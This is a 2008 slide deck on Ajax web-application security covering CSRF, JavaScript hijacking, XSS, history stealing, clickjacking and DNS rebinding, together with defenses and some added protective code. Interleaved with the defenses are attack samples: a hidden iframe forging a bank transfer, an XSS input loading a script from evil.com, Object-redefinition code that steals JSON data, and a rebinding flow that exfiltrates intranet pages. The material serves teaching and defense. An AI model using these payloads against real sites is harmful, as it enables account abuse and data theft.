Ajax Security
1. Ajax Security
Keeping your application safe
Joe Walker
Copyright SitePen, Inc. 2008. All Rights Reserved
2. 89 out of 10 Websites
have serious vulnerabilities
3. Goal: Keep the bad guys
out of your website
4. The Attackers
Who is the attacker?
• Troublemakers / Thieves
Who is the victim?
• Your data / Your users / Your partners
5. Agenda
CSRF, Login CSRF
JavaScript Hijacking
XSS
History Stealing
Combination Attacks
Session Fixation + ADP +
Clickjacking
6. CSRF
(Cross Site Request Forgery)
You can still abuse someone else’s cookies
and headers even if you can’t read them
7. Recap: Cross-Domain Rules
On www.bank.com:
c = document.cookie;
alert(c);
/* Shows cookies from www.bank.com */
On www.evil.com:
c = document.cookie;
alert(c);
/* Shows cookies from www.evil.com */
8. Abusing a Cookie without reading it
www.bank.com:
Welcome to Bank.com
We offer the best rates anywhere in the world, guaranteed. Give us your money and we will look after it in the same way we look after little baby kittens.
www.evil.com:
Welcome to Evil.com
We’ve got lots of warez to give away for freee. Download our stuffs and then come back and get more stuffs. Videoz, Warez, Codez, Mp3s.
(hidden in the evil.com page:)
<iframe width=0 height=0
src="http://bank.com/transfer?amnt=all&dest=MrEvil"/>
9. CSRF
JavaScript is not always required to exploit a CSRF hole
Often all you need is:
• <iframe src="dangerous_url">
• or <img src="dangerous_url"/>
• or <script src="dangerous_url">
You can’t use XHR because cross-domain rules prevent
the request from being sent
10. CSRF
CSRF attacks are write-only (with one exception)
Both GET and POST can be forged
Referrer checking is not a complete fix
It’s not just cookies that get stolen:
• HTTP-Auth headers
• Active Directory Kerberos tokens
11. CSRF - Protection
Not a 100% solution:
• Force users to log off
• Check referrer headers (https only)
The only complete solution:
• Include authentication tokens in the body of EVERY request
12. CSRF - Protection
Security tokens in GET requests are not a great idea
(bookmarks, caches, GET is idempotent etc)
POST means forms with hidden fields
• OWASP servlet filter
http://www.owasp.org/index.php/CSRF_Guard
Double-submit cookie pattern (Ajax requests only)
• Read the cookie with JavaScript and submit it in the body
14. Login CSRF
If I can make your browser do things behind your back,
how about logging you out of some service and back in
as me.
What are the possibilities when you think that you are
you, but you’re not; you’re me?
15. Login CSRF - Attacks
What can I do?
• See what you search for
• See what books you want to buy
• Read emails that you send
• Steal credit card details through PayPal
• etc
16. Login CSRF - Defense
If submitting over https: use Referrer checking
• Do not assume no referrer is safe
Use authentication tokens in your login form
Watch out for session fixation attacks
• Invalidate the server session on login and re-create it
17. JavaScript Hijacking
(or how your GMail contacts were at risk)
Sucking data out of Objects before they’re created
18. JavaScript Hijacking
“CSRF is write-only with one known exception”
Using <script> automatically evaluates the returned
script
So if you can just find a way to intercept scripts as they
are evaluated ...
19. <script type="text/javascript">
  // Redefining Object: any later object literal now runs this function
  function Object() {
    alert("Hello, World");
  }
  var x = {};
</script>
20. <script type="text/javascript">
  // A setter on the redefined Object sees every property written to it
  function Object() {
    this.__defineSetter__('wibble', function(x) {
      alert(x);
    });
  }
  var x = {};
  x.wibble = "Hello, World";
</script>
21. <script type="text/javascript">
  var obj;
  function Object() {
    obj = this;
    this.__defineSetter__('killme', function(x) {
      for (var key in obj) {
        if (key != 'killme') {
          alert('Stolen: ' + key + '=' + obj[key]);
        }
      }
    });
    // fire the setter once the included script has finished building the object
    setTimeout("obj['killme']='ignored';", 0);
  }
</script>
<script src="http://example.com/data-service/">
22. JavaScript Hijacking
When you serve JavaScript from a website it
could be evaluated in a hostile environment
Protect secrets in JavaScript in the same way
that you would protect them elsewhere
23. JavaScript Hijacking
Sometimes people wish to have a double layer of
security to prevent evaluation:
/*<JSON_HERE>*/ (Don’t do this)
while(true); <JSON_HERE> (Google)
throw new Error(""); <JSON_HERE> (DWR)
{}&& <JSON_HERE>
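The DWR-style prefix from this slide with the matching Ajax client, as an added example rather than DWR's or the deck's own code. It shows why the prefix works: a response evaluated as a script (the situation of slide 21) aborts before the array literal is built, while a same-origin XHR client simply strips the prefix and parses. Function names are mine; the contact list is constructed.

```javascript
// Added example: anti-hijacking prefix on a JSON response and the client that
// removes it. Names are my own, not DWR's API.
const PREFIX = 'throw new Error("");';

// Server side: never emit a bare array/object literal that <script src> could
// evaluate; put the throw in front of it.
function serveProtectedJson(data) {
  return PREFIX + JSON.stringify(data);
}

// Client side: only same-origin XHR can read the body, so only our own page
// reaches this point. Strip the exact prefix, then use JSON.parse, not eval.
function parseProtectedJson(text) {
  if (!text.startsWith(PREFIX)) throw new Error("missing anti-hijack prefix");
  return JSON.parse(text.slice(PREFIX.length));
}

// Models what a cross-site <script src="..."> inclusion does: run the body as a
// script. Returns true if it ran to completion (data exposed to the page),
// false if the prefix aborted it first.
function runsAsScript(body) {
  try { new Function(body)(); return true; } catch (e) { return false; }
}

// Constructed sample payload, in the shape of the contacts list the deck
// mentions (an array literal, which evaluates silently as a script).
const contacts = [{ name: "Alice", email: "alice@example.com" }];
```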
24. XSS (Cross Site Scripting)
Abusing someone’s trust in your typing
26. XSS
2 types:
• Reflected: Script embedded in the request is
‘reflected’ in the response
• Stored: Attacker’s input is stored and played back in
later page views
27. XSS
Scenario: You let the user enter their name
Someone is going to enter their name like this:
Joe<script src="http://evil.com/danger.js">
Then, whoever looks at Joe’s name will execute Joe’s
script and become a slave of Joe
Generally HTML is not a valid input, but sometimes it is:
• Blogs, MySpace, Wikis, RSS readers, etc
28. XSS - Making User Input Safe
So, you filter out ‘<script.*>’ and then you’re safe.
Right?
30. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href="a.html" link</a>
makes perfect sense to a browser.
31. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href="a.html">link
makes perfect sense to a browser.
32. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This:
<a href="a.html >link</a>
makes perfect sense to a browser.
33. XSS - Making User Input Safe
It’s made 1000 times worse by browsers being able to
make sense of virtually anything.
This: (depending on some encoding tricks)
¼a href="a.html"¾link¼/a¾
makes perfect sense to a browser.
34. XSS - Making User Input Safe
And we haven’t got into:
• Flash (ActionScript ~= JavaScript)
• SVG (can embed JavaScript)
• XML Data Islands (IE only)
• HTML+TIME
You can use both <object> and <embed> for many of
these
35. XSS - The Heart of the Problem
“Be conservative in what you do; be
liberal in what you accept from others”
Postel’s Law
36. XSS - The Heart of the Problem
In + A Out
B
37. The web developers get lazy ...
38. The browser fixes the problems ...
39. The users like the new browser ...
41. The browser fixes the problems ...
42. The users like the new browser even more ...
43. XSS - The Heart of the Problem
¼STYLE¾@import'javas
cri
pt:danger()';¼/STYLE¾
44. XSS - Protection (HTML is Illegal)
1. Filter inputs by white-listing input characters
• Remember to filter header names and values
2. Filter outputs for the destination environment
For HTML:
<  →  &lt;    >  →  &gt;    '  →  &#39;    "  →  &quot;    &  →  &amp;
For JavaScript Strings (but see later):
'  →  \'    "  →  \"    LF  →  \n    CR  →  \r    * (anything else)  →  \uXXXX
Other environments have other special chars
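The two output filters from this slide beside an input whitelist, as an added example (my code, not the deck's). The JavaScript-string filter applies the slide's `*` rule literally, encoding every non-alphanumeric character as `\uXXXX`, which also covers `</script>` closing the block; function names are mine and the sample inputs are constructed.

```javascript
// Added example: whitelist input filtering plus output encoding for the two
// destination environments on the slide. Names are my own.

// Step 1: input whitelist for a "display name" field. Reject rather than
// trying to clean anything outside the allowed set.
function isValidName(s) {
  return typeof s === "string" && s.length <= 40 && /^[A-Za-z0-9 .'-]+$/.test(s);
}

// Step 2a: output encoding for an HTML text node or a quoted attribute value.
const HTML_MAP = { "<": "&lt;", ">": "&gt;", "'": "&#39;", '"': "&quot;", "&": "&amp;" };
function escapeHtml(s) {
  return String(s).replace(/[<>'"&]/g, (c) => HTML_MAP[c]);
}

// Step 2b: output encoding for a JavaScript string literal. Everything except
// [A-Za-z0-9] becomes \uXXXX, so quotes, newlines and the "</" of a closing
// script tag can never end the literal or the <script> block.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The deck's "enter your name" scenario rendered into both safe injection
// points: plain content, and a JavaScript string value.
function renderNameHtml(name) {
  return "<div>" + escapeHtml(name) + "</div>";
}
function renderNameScript(name) {
  return '<script>var name = "' + escapeJsString(name) + '";</script>';
}
```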
45. XSS - Protection (well-formed HTML is legal)
1. Filter inputs as before
2. Validate as HTML and throw away if it fails
3. Swap characters for entities (as before)
4. Swap back a whitelist of allowed tags, e.g.:
• &lt;strong&gt; → <strong>
5. Take extra care over attributes:
• &lt;a href=&quot;([^&]*)&quot;/&gt; → <a href="$1"/>
6. Take great care over regular expressions
46. XSS - Protection (malformed HTML is legal)
1. Find another way to do it / Swap jobs / Find
some other solution to the problem
2. Create a tag soup parser to create a DOM tree
from a badly formed HTML document
• Remember to recursively check encodings
3. Create a tree walker that removes all non
approved elements and attributes
47. There is NO WAY to protect
against some injection points
48. XSS - Injection Points
Places you can protect:
• Plain content
<div>$</div>
• Some attribute values
<input name=x value="$"> (but take care)
• JavaScript string values:
<script>str = "$";</script> (but take care)
Anything else is likely to be unsafe
49. XSS - Injection Points
Places you can’t easily protect:
• <script>$</script>
• <div $>
• <div style="$">...
• <div background="$">
• <img src="$">
• etc
If users can affect CSS values, hrefs, srcs or plain
JavaScript then you are likely to have an XSS hole
50. XSS Tricks:
Comment Power-up
51. XSS - Comment Power-up
Commonly reflected attacks have length restrictions
How to create space for an injection attack
• Use ‘<script>/*’ in a restricted unprotected field
and ‘*/’ in a later unrestricted protected field
52. XSS - Summary
For data input:
• Restrict allowed characters for destination type
For data output:
• Escape for the destination environment
• Ensure the encoding is specified (e.g. UTF-8)
Allow injection only into known safe points
Never assume that a hole is too small to jump through
54. History Stealing - Part 1
Mr. Evil wants to know if you visit bank.com
He creates a page with a link and uses a script to read the CSS link color:
• purple: customer
• blue: not a customer
55. History Stealing - Part 2
2 methods of detecting link color:
• Easy - use JavaScript to read CSS properties
• When JS is turned off - use CSS to ping the server
56. History Stealing - Part 2
Point a script tag at a protected HTML resource, detect
differing replies by differing error messages
<script src="http://mail.google.com/mail">
http://ha.ckers.org/weird/javascript-website-login-checker.html
57. History Stealing - Part 3
A page can quickly check thousands of sites and find
where you bank and store your email
A page can follow your clicks around the net:
• Check for common set of URLs
• Page reports hits to server
• Server reads hit pages, greps out links sends links
back
• Page checks and follows a click-stream
59. Web Worms
If your site isn’t 100% safe against XSS and CSRF, users
can attack their ‘friends’ with scripts
XHR/Flash/Quicktime can be used as a vector
Web worms grow much faster than email worms
So far, infections have been mostly benign, like how email
worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
60. Intranet Hacking
History stealing to enumerate hosts inside the firewall
Anti-DNS pinning to read HTML from inside
Many routers / firewalls / etc have default passwords,
which an attacker can exploit
Use CSRF to alter router / firewall settings
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf
62. Clickjacking - Protection
// If this page is not the top-level window it is being framed: hide it
if (window.top != window) {
  document.body.style.display = "none";
}
63. ADP = Anti DNS Pinning
Moving intranet servers into your domain
64. Anti-DNS Pinning
(Diagram, carried through slides 64-75: the browser, the DNS server for evil.com, a web server at 1.2.3.4 and a second server at 10.0.0.1.)
65. Anti-DNS Pinning
Browser: Let’s visit evil.com
66. Anti-DNS Pinning
Browser to DNS: What’s the IP address for evil.com?
67. Anti-DNS Pinning
DNS to browser: You need 1.2.3.4 (timeout = 1 sec)
68. Anti-DNS Pinning
Browser to 1.2.3.4: Can I have http://evil.com?
69. Anti-DNS Pinning
1.2.3.4 to browser: HTML + JavaScript that creates an iframe 2 seconds after the page has loaded
70. Anti-DNS Pinning
Time passes (2 seconds)
71. Anti-DNS Pinning
Browser to DNS: What’s the IP address for evil.com?
72. Anti-DNS Pinning
DNS to browser: You need 10.0.0.1
73. Anti-DNS Pinning
Browser to 10.0.0.1: Can I have http://evil.com/blah?
74. Anti-DNS Pinning
10.0.0.1: This web server is really http://intranet.corp.com
75. Anti-DNS Pinning
Outer frame reads text from inner iframe and sends it back to 1.2.3.4
76. Anti-DNS Pinning
About ‘Pinning’:
Browsers ‘pin’ addresses to stop short timeouts
DNS round-robin forces re-query of DNS if
website appears to be down
So websites can get around pins by firewalling
themselves thus appearing to be down
77. Anti-DNS Pinning
It’s not great for the Internet:
The browser thinks the domain is evil.com, so cookies
for innocent.com are not sent:
Cookie protected resources are safe (for now)
But it’s great for Intranet hacking
No cookies needed to read from
192.168.0.1 or 127.0.0.1
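An intranet-side check against the rebinding sequence above, added here as an example and not taken from the deck: when evil.com is re-pointed at 10.0.0.1, the browser still believes it is talking to evil.com and sends `Host: evil.com`, so a server that answers only for its own names refuses the request and the outer frame gets nothing to read. The header object, host list and handler are constructed stand-ins for a real server's.

```javascript
// Added example: Host-header validation for an intranet web server. The list of
// names and the request shape are constructed for the example.
const OWN_HOSTS = new Set(["intranet.corp.com", "intranet.corp.com:80", "10.0.0.1"]);

// Find the Host header regardless of case (HTTP header names are case-insensitive).
function hostHeaderOf(headers) {
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() === "host") return String(v).trim().toLowerCase();
  }
  return null;
}

// True only when the browser thinks it is talking to one of our names. Any
// other value (or no Host at all) means the socket reached us under a foreign
// DNS name, which is exactly the anti-DNS-pinning situation.
function hostIsAllowed(headers, allowed = OWN_HOSTS) {
  const host = hostHeaderOf(headers);
  return host !== null && allowed.has(host);
}

// Reject early with an empty body so there is no page content to exfiltrate.
function handle(headers) {
  if (!hostIsAllowed(headers)) return { status: 400, body: "" };
  return { status: 200, body: "<html>intranet page</html>" };
}
```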
78. Questions?
Joe Walker
http://sitepen.com
http://directwebremoting.org/blog/joe
80. Web 2.0 Hacking
Building blocks:
• Google Alerts: Search to EMail
• Mailinator: EMail to RSS
• Ponyfish: Web to RSS via scraping
• Storage: DabbleDB, Zoho
• Yahoo Pipes: RSS remixing
• L8R: Cron for EMail
• Google Mashup Editor: RSS to REST API
• Dapper, OpenKappow
82. Dropping SSL after login is dangerous
Being able to snoop on someone else’s cookie is
virtually the same as being able to snoop on their
password
Some services (e.g. Google) default to http after login
(bad), but allow you to use https for the whole session:
• https://mail.google.com/mail/
• https://www.google.com/calendar/
• etc.
83. Useful Tools
Firefox:
• NoScript - Accept scripts only from sites you trust
• AltCookies - Accept cookies only from sites you trust
• EditCookies - Alter cookies for testing
• Firebug - Dig deeply into HTML/JavaScript/CSS and HTTP
General:
• Paros - Filtering Proxy (can be configured to be
transparent)
• Burp - Like Paros
• Fiddler - Like Paros with integration into IE